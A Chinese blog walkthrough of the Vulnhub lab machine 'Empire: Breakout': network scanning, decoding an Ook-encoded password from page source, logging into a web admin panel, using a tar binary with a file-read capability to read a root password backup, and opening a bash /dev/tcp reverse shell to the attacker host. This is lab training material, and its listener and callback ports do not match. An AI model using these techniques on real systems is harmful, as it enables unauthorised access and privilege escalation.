【Vulnhub靶场】EMPIRE: BREAKOUT

EMPIRE: BREAKOUT 帝国突围

环境准备

下载地址:https://download.vulnhub.com/empire/02-Breakout.zip
下载后用虚拟机打开即可。
靶机:192.168.147.183
攻击机kali:192.168.147.178
打开靶机后。其实可以看到靶机地址,不许用我们去探测。
image

一、信息收集

1、扫描同网段ip。

  • arp-scan l

image

2、确定靶机ip后,查看开启端口和服务。

  • nmap -A -sV 192.168.147.183
    image
  • 可以看到开启三个http服务和smb服务。
  • 80页面是正常的服务,无异常。我们查看页面源代码
    image
  • 查看页面源代码,最下端,发现了ook加密的过后的字符串,解码网站 Brainfuck/Ook!
    image
  • 解密过后是:.2uqPEfj3D<P'a-3 我们先将密码记录下来。
  • 访问10000和20000端口,发现分别是管理员和用户登录界面。
    image
    image

二、渗透

  • 由于开启了smb服务,我们可以用命令搜集靶机更多的相关信息。
  • enum4linux 192.168.147.183
    image
  • 得到用户名cyber,在20000端口尝试登陆。
    image
  • 可以看到左下角有个终端,可以执行命令。
    拿到第一个flag。
    image
  • 看到有个文件tar,我们ls -l查看文件权限,可以看出tar文件可运行。
    image
  • getcap tar 发现该文件具有任意读取文件的权限。此处有深意。
    image
  • 那就肯定是要我们找一个文件来读取,获得root的密码
    经过一番寻找之后,发现/var/backups下有个备份文件.old_pass.bak
    image
    直接读取.old_pass.bak文件无法读取,但是我们可以用tar命令将其压缩在解压就可以顺利读取了。
    ./tar -cvf pass.tar /var/backups/.old_pass.bak (注:此处使用./tar 表示使用此目录的tar文件)
    tar -xvf pass.tar
    image
  • 进入目录查看cat .old_pass.bak ,获取到root密码。Ts&4&YurgtRX(=~h
    image
  • 反弹shell
    首先攻击机开启监听:nc -lvp 1234
    然后靶机执行bash命令:bash -i >& /dev/tcp/192.168.147.178/10086 0>&1
    成功拿到第二个flag。
    image

posted on 2022-03-01 14:32  水果味儿  阅读(420)  评论(0编辑  收藏  举报